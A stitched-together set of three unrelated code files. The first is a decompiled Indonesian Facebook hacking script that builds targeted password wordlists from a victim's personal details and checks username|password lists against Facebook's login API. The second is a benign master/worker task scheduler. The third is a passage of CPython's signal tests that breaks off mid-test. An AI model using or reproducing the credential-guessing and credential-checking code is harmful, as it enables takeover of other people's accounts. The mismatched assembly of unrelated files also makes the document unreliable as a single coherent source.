print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Kembali'
print
g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
# okay decompiling 3.pyc
|
worker.py
|
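# worker.py -- a worker node for a simple master/worker task scheduler.
# It listens on the port given as the first command-line argument for batches
# of simulated tasks sent by a master (newline-separated '<task_id> <duration>'
# strings), "runs" each task by sleeping for its duration in its own thread,
# and reports each completion back to the master at 127.0.0.1:5001.
# Usage: python worker.py <port> <worker_id>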
import socket
import json
import time
import sys
import random
import numpy as np
import threading
import logging
# initializing the logging and setting up the per-worker logger (writes to Worker_<id>.log)
def init_log(id,port):
filen1="Worker_"+str(id)+".log"
filen2="log_from_worker"
logging.basicConfig(filename=filen1, format='%(asctime)s,%(message)s', filemode='a')
logger=logging.getLogger(filen2)
logger.setLevel(logging.DEBUG)
# listen to the master for incoming task batches (newline-separated '<task_id> <duration>' strings)
def listen_master(port):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host=''
s.bind((host,port))
while 1:
s.listen(50) #can be increased based on tasks receiving
conn,addr=s.accept()
w_th=[]
#print('connected to this by adress',addr)
while 1:
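            # an empty recv() means the master closed the connection; otherwise the payload is one batch of tasks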
task_exec=conn.recv(2048)
if task_exec:
task_exec=task_exec.decode()
duras=task_exec.strip().split('\n')
print("Recieved Tasks form master: ",(duras))
copy_duras=duras.copy()
pol=threading.Thread(target=pool,args=(copy_duras,port,))
w_th.append(pol)
pol.start()
else:
break
conn.close()
'''
for i in w_th:
wt=i
wt.join()
w_th.remove(i)
'''
# parsing the batch and handing each task to the pool (one thread per task)
def pool(copy_duras,port):
dura_th=[]
logger=logging.getLogger("log_from_worker")
for dura in copy_duras:
task,dura1=dura.split(' ')
logger.info("Task_starting_of_duration: "+str(dura1))
print("Task added to pool of duration: ",dura1)
task_sch=threading.Thread(target=add_to_pool,args=(dura,port,))
dura_th.append(task_sch)
task_sch.start()
'''
for i in dura_th:
da=i
da.join()
dura_th.remove(i)
'''
# executing the task (simulated by sleeping for its duration) and reporting completion to the master on port 5001
def add_to_pool(dura,port):
task1,dura2=dura.split(' ')
logger=logging.getLogger("log_from_worker")
time.sleep(int(dura2))
logger.info("Task_finished_of_duration: "+str(dura2))
print("Task finished of duration: "+str(dura2))
host_to_send = '127.0.0.1'
port_to_send = 5001
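    # report completion back to the master's listener, hardcoded above to 127.0.0.1:5001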
workerSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
workerSocket.connect((host_to_send,port_to_send))
done=task1+' '+str(port)+'\n'
workerSocket.send(done.encode())
workerSocket.close()
if __name__=="__main__":
port=int(sys.argv[1])
id=int(sys.argv[2])
init_log(id,port)
lis_master=threading.Thread(target=listen_master,args=(port,))
lis_master.start()
lis_master.join()
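# ---------------------------------------------------------------------------
# Hypothetical usage sketch (not part of the original worker): a minimal
# "master" that pushes one batch of tasks to a worker and then collects the
# completion reports the worker sends back to port 5001. The message formats
# ('<task_id> <duration>' per line out, '<task_id> <worker_port>\n' back) and
# the reply port 5001 are taken from the code above; worker_port=4000 and the
# task ids/durations are made-up example values. To try it, start a worker
# with `python worker.py 4000 1` in another terminal, then call _demo_master().
def _demo_master(worker_port=4000, listen_port=5001):
    # listen for completion reports first, so none are missed
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(('', listen_port))
    srv.listen(5)
    # push a batch of two fake tasks to the worker
    batch = "task_0 2\ntask_1 3\n"
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect(('127.0.0.1', worker_port))
        s.send(batch.encode())
    # each completion arrives on its own connection as '<task_id> <worker_port>\n'
    for _ in range(2):
        conn, _addr = srv.accept()
        print("master received:", conn.recv(2048).decode().strip())
        conn.close()
    srv.close()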
|
test_signal.py
|
import enum
import errno
import inspect
import os
import random
import signal
import socket
import statistics
import subprocess
import sys
import threading
import time
import unittest
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, spawn_python
try:
import _testcapi
except ImportError:
_testcapi = None
class GenericTests(unittest.TestCase):
def test_enums(self):
for name in dir(signal):
sig = getattr(signal, name)
if name in {'SIG_DFL', 'SIG_IGN'}:
self.assertIsInstance(sig, signal.Handlers)
elif name in {'SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'}:
self.assertIsInstance(sig, signal.Sigmasks)
elif name.startswith('SIG') and not name.startswith('SIG_'):
self.assertIsInstance(sig, signal.Signals)
elif name.startswith('CTRL_'):
self.assertIsInstance(sig, signal.Signals)
self.assertEqual(sys.platform, "win32")
CheckedSignals = enum._old_convert_(
enum.IntEnum, 'Signals', 'signal',
lambda name:
name.isupper()
and (name.startswith('SIG') and not name.startswith('SIG_'))
or name.startswith('CTRL_'),
source=signal,
)
enum._test_simple_enum(CheckedSignals, signal.Signals)
CheckedHandlers = enum._old_convert_(
enum.IntEnum, 'Handlers', 'signal',
lambda name: name in ('SIG_DFL', 'SIG_IGN'),
source=signal,
)
enum._test_simple_enum(CheckedHandlers, signal.Handlers)
Sigmasks = getattr(signal, 'Sigmasks', None)
if Sigmasks is not None:
CheckedSigmasks = enum._old_convert_(
enum.IntEnum, 'Sigmasks', 'signal',
lambda name: name in ('SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'),
source=signal,
)
enum._test_simple_enum(CheckedSigmasks, Sigmasks)
def test_functions_module_attr(self):
# Issue #27718: If __all__ is not defined all non-builtin functions
# should have correct __module__ to be displayed by pydoc.
for name in dir(signal):
value = getattr(signal, name)
if inspect.isroutine(value) and not inspect.isbuiltin(value):
self.assertEqual(value.__module__, 'signal')
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class PosixTests(unittest.TestCase):
def trivial_signal_handler(self, *args):
pass
def test_out_of_range_signal_number_raises_error(self):
self.assertRaises(ValueError, signal.getsignal, 4242)
self.assertRaises(ValueError, signal.signal, 4242,
self.trivial_signal_handler)
self.assertRaises(ValueError, signal.strsignal, 4242)
def test_setting_signal_handler_to_none_raises_error(self):
self.assertRaises(TypeError, signal.signal,
signal.SIGUSR1, None)
def test_getsignal(self):
hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler)
self.assertIsInstance(hup, signal.Handlers)
self.assertEqual(signal.getsignal(signal.SIGHUP),
self.trivial_signal_handler)
signal.signal(signal.SIGHUP, hup)
self.assertEqual(signal.getsignal(signal.SIGHUP), hup)
def test_strsignal(self):
self.assertIn("Interrupt", signal.strsignal(signal.SIGINT))
self.assertIn("Terminated", signal.strsignal(signal.SIGTERM))
self.assertIn("Hangup", signal.strsignal(signal.SIGHUP))
# Issue 3864, unknown if this affects earlier versions of freebsd also
def test_interprocess_signal(self):
dirname = os.path.dirname(__file__)
script = os.path.join(dirname, 'signalinterproctester.py')
assert_python_ok(script)
def test_valid_signals(self):
s = signal.valid_signals()
self.assertIsInstance(s, set)
self.assertIn(signal.Signals.SIGINT, s)
self.assertIn(signal.Signals.SIGALRM, s)
self.assertNotIn(0, s)
self.assertNotIn(signal.NSIG, s)
self.assertLess(len(s), signal.NSIG)
@unittest.skipUnless(sys.executable, "sys.executable required.")
def test_keyboard_interrupt_exit_code(self):
"""KeyboardInterrupt triggers exit via SIGINT."""
process = subprocess.run(
[sys.executable, "-c",
"import os, signal, time\n"
"os.kill(os.getpid(), signal.SIGINT)\n"
"for _ in range(999): time.sleep(0.01)"],
stderr=subprocess.PIPE)
self.assertIn(b"KeyboardInterrupt", process.stderr)
self.assertEqual(process.returncode, -signal.SIGINT)
# Caveat: The exit code is insufficient to guarantee we actually died
# via a signal. POSIX shells do more than look at the 8 bit value.
# Writing an automation friendly test of an interactive shell
# to confirm that our process died via a SIGINT proved too complex.
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
class WindowsSignalTests(unittest.TestCase):
def test_valid_signals(self):
s = signal.valid_signals()
self.assertIsInstance(s, set)
self.assertGreaterEqual(len(s), 6)
self.assertIn(signal.Signals.SIGINT, s)
self.assertNotIn(0, s)
self.assertNotIn(signal.NSIG, s)
self.assertLess(len(s), signal.NSIG)
def test_issue9324(self):
# Updated for issue #10003, adding SIGBREAK
handler = lambda x, y: None
checked = set()
for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE,
signal.SIGILL, signal.SIGINT, signal.SIGSEGV,
signal.SIGTERM):
# Set and then reset a handler for signals that work on windows.
# Issue #18396, only for signals without a C-level handler.
if signal.getsignal(sig) is not None:
signal.signal(sig, signal.signal(sig, handler))
checked.add(sig)
# Issue #18396: Ensure the above loop at least tested *something*
self.assertTrue(checked)
with self.assertRaises(ValueError):
signal.signal(-1, handler)
with self.assertRaises(ValueError):
signal.signal(7, handler)
@unittest.skipUnless(sys.executable, "sys.executable required.")
def test_keyboard_interrupt_exit_code(self):
"""KeyboardInterrupt triggers an exit using STATUS_CONTROL_C_EXIT."""
# We don't test via os.kill(os.getpid(), signal.CTRL_C_EVENT) here
# as that requires setting up a console control handler in a child
# in its own process group. Doable, but quite complicated. (see
# @eryksun on https://github.com/python/cpython/pull/11862)
process = subprocess.run(
[sys.executable, "-c", "raise KeyboardInterrupt"],
stderr=subprocess.PIPE)
self.assertIn(b"KeyboardInterrupt", process.stderr)
STATUS_CONTROL_C_EXIT = 0xC000013A
self.assertEqual(process.returncode, STATUS_CONTROL_C_EXIT)
class WakeupFDTests(unittest.TestCase):
def test_invalid_call(self):
# First parameter is positional-only
with self.assertRaises(TypeError):
signal.set_wakeup_fd(signum=signal.SIGINT)
# warn_on_full_buffer is a keyword-only parameter
with self.assertRaises(TypeError):
signal.set_wakeup_fd(signal.SIGINT, False)
def test_invalid_fd(self):
fd = os_helper.make_bad_fd()
self.assertRaises((ValueError, OSError),
signal.set_wakeup_fd, fd)
def test_invalid_socket(self):
sock = socket.socket()
fd = sock.fileno()
sock.close()
self.assertRaises((ValueError, OSError),
signal.set_wakeup_fd, fd)
def test_set_wakeup_fd_result(self):
r1, w1 = os.pipe()
self.addCleanup(os.close, r1)
self.addCleanup(os.close, w1)
r2, w2 = os.pipe()
self.addCleanup(os.close, r2)
self.addCleanup(os.close, w2)
if hasattr(os, 'set_blocking'):
os.set_blocking(w1, False)
os.set_blocking(w2, False)
signal.set_wakeup_fd(w1)
self.assertEqual(signal.set_wakeup_fd(w2), w1)
self.assertEqual(signal.set_wakeup_fd(-1), w2)
self.assertEqual(signal.set_wakeup_fd(-1), -1)
def test_set_wakeup_fd_socket_result(self):
sock1 = socket.socket()
self.addCleanup(sock1.close)
sock1.setblocking(False)
fd1 = sock1.fileno()
sock2 = socket.socket()
self.addCleanup(sock2.close)
sock2.setblocking(False)
fd2 = sock2.fileno()
signal.set_wakeup_fd(fd1)
self.assertEqual(signal.set_wakeup_fd(fd2), fd1)
self.assertEqual(signal.set_wakeup_fd(-1), fd2)
self.assertEqual(signal.set_wakeup_fd(-1), -1)
# On Windows, files are always blocking and Windows does not provide a
# function to test if a socket is in non-blocking mode.
@unittest.skipIf(sys.platform == "win32", "tests specific to POSIX")
def test_set_wakeup_fd_blocking(self):
rfd, wfd = os.pipe()
self.addCleanup(os.close, rfd)
self.addCleanup(os.close, wfd)
# fd must be non-blocking
os.set_blocking(wfd, True)
with self.assertRaises(ValueError) as cm:
signal.set_wakeup_fd(wfd)
self.assertEqual(str(cm.exception),
"the fd %s must be in non-blocking mode" % wfd)
# non-blocking is ok
os.set_blocking(wfd, False)
signal.set_wakeup_fd(wfd)
signal.set_wakeup_fd(-1)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class WakeupSignalTests(unittest.TestCase):
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def check_wakeup(self, test_body, *signals, ordered=True):
# use a subprocess to have only one thread
code = """if 1:
import _testcapi
import os
import signal
import struct
signals = {!r}
def handler(signum, frame):
pass
def check_signum(signals):
data = os.read(read, len(signals)+1)
raised = struct.unpack('%uB' % len(data), data)
if not {!r}:
raised = set(raised)
signals = set(signals)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
{}
signal.signal(signal.SIGALRM, handler)
read, write = os.pipe()
os.set_blocking(write, False)
signal.set_wakeup_fd(write)
test()
check_signum(signals)
os.close(read)
os.close(write)
""".format(tuple(map(int, signals)), ordered, test_body)
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_wakeup_write_error(self):
# Issue #16105: write() errors in the C signal handler should not
# pass silently.
# Use a subprocess to have only one thread.
code = """if 1:
import _testcapi
import errno
import os
import signal
import sys
from test.support import captured_stderr
def handler(signum, frame):
1/0
signal.signal(signal.SIGALRM, handler)
r, w = os.pipe()
os.set_blocking(r, False)
# Set wakeup_fd a read-only file descriptor to trigger the error
signal.set_wakeup_fd(r)
try:
with captured_stderr() as err:
signal.raise_signal(signal.SIGALRM)
except ZeroDivisionError:
# An ignored exception should have been printed out on stderr
err = err.getvalue()
if ('Exception ignored when trying to write to the signal wakeup fd'
not in err):
raise AssertionError(err)
if ('OSError: [Errno %d]' % errno.EBADF) not in err:
raise AssertionError(err)
else:
raise AssertionError("ZeroDivisionError not raised")
os.close(r)
os.close(w)
"""
r, w = os.pipe()
try:
os.write(r, b'x')
except OSError:
pass
else:
self.skipTest("OS doesn't report write() error on the read end of a pipe")
finally:
os.close(r)
os.close(w)
assert_python_ok('-c', code)
def test_wakeup_fd_early(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
class InterruptSelect(Exception):
pass
def handler(signum, frame):
raise InterruptSelect
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
# We attempt to get a signal during the sleep,
# before select is called
try:
select.select([], [], [], TIMEOUT_FULL)
except InterruptSelect:
pass
else:
raise Exception("select() was not interrupted")
before_time = time.monotonic()
select.select([read], [], [], TIMEOUT_FULL)
after_time = time.monotonic()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_wakeup_fd_during(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
class InterruptSelect(Exception):
pass
def handler(signum, frame):
raise InterruptSelect
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
before_time = time.monotonic()
# We attempt to get a signal during the select call
try:
select.select([read], [], [], TIMEOUT_FULL)
except InterruptSelect:
pass
else:
raise Exception("select() was not interrupted")
after_time = time.monotonic()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_signum(self):
self.check_wakeup("""def test():
signal.signal(signal.SIGUSR1, handler)
signal.raise_signal(signal.SIGUSR1)
signal.raise_signal(signal.SIGALRM)
""", signal.SIGUSR1, signal.SIGALRM)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pending(self):
self.check_wakeup("""def test():
signum1 = signal.SIGUSR1
signum2 = signal.SIGUSR2
signal.signal(signum1, handler)
signal.signal(signum2, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, (signum1, signum2))
signal.raise_signal(signum1)
signal.raise_signal(signum2)
# Unblocking the 2 signals calls the C signal handler twice
signal.pthread_sigmask(signal.SIG_UNBLOCK, (signum1, signum2))
""", signal.SIGUSR1, signal.SIGUSR2, ordered=False)
@unittest.skipUnless(hasattr(socket, 'socketpair'), 'need socket.socketpair')
class WakeupSocketSignalTests(unittest.TestCase):
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_socket(self):
# use a subprocess to have only one thread
code = """if 1:
import signal
import socket
import struct
import _testcapi
signum = signal.SIGINT
signals = (signum,)
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
write.setblocking(False)
signal.set_wakeup_fd(write.fileno())
signal.raise_signal(signum)
data = read.recv(1)
if not data:
raise Exception("no signum written")
raised = struct.unpack('B', data)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
read.close()
write.close()
"""
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_send_error(self):
# Use a subprocess to have only one thread.
if os.name == 'nt':
action = 'send'
else:
action = 'write'
code = """if 1:
import errno
import signal
import socket
import sys
import time
import _testcapi
from test.support import captured_stderr
signum = signal.SIGINT
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
read.setblocking(False)
write.setblocking(False)
signal.set_wakeup_fd(write.fileno())
# Close sockets: send() will fail
read.close()
write.close()
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if ('Exception ignored when trying to {action} to the signal wakeup fd'
not in err):
raise AssertionError(err)
""".format(action=action)
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_warn_on_full_buffer(self):
# Use a subprocess to have only one thread.
if os.name == 'nt':
action = 'send'
else:
action = 'write'
code = """if 1:
import errno
import signal
import socket
import sys
import time
import _testcapi
from test.support import captured_stderr
signum = signal.SIGINT
# This handler will be called, but we intentionally won't read from
# the wakeup fd.
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
# Fill the socketpair buffer
if sys.platform == 'win32':
# bpo-34130: On Windows, sometimes non-blocking send fails to fill
# the full socketpair buffer, so use a timeout of 50 ms instead.
write.settimeout(0.050)
else:
write.setblocking(False)
written = 0
if sys.platform == "vxworks":
CHUNK_SIZES = (1,)
else:
# Start with large chunk size to reduce the
# number of send needed to fill the buffer.
CHUNK_SIZES = (2 ** 16, 2 ** 8, 1)
for chunk_size in CHUNK_SIZES:
chunk = b"x" * chunk_size
try:
while True:
write.send(chunk)
written += chunk_size
except (BlockingIOError, TimeoutError):
pass
print(f"%s bytes written into the socketpair" % written, flush=True)
write.setblocking(False)
try:
write.send(b"x")
except BlockingIOError:
# The socketpair buffer seems full
pass
else:
raise AssertionError("%s bytes failed to fill the socketpair "
"buffer" % written)
# By default, we get a warning when a signal arrives
msg = ('Exception ignored when trying to {action} '
'to the signal wakeup fd')
signal.set_wakeup_fd(write.fileno())
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("first set_wakeup_fd() test failed, "
"stderr: %r" % err)
# And also if warn_on_full_buffer=True
signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=True)
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("set_wakeup_fd(warn_on_full_buffer=True) "
"test failed, stderr: %r" % err)
# But not if warn_on_full_buffer=False
signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=False)
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if err != "":
raise AssertionError("set_wakeup_fd(warn_on_full_buffer=False) "
"test failed, stderr: %r" % err)
# And then check the default again, to make sure warn_on_full_buffer
# settings don't leak across calls.
signal.set_wakeup_fd(write.fileno())
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if msg not in err:
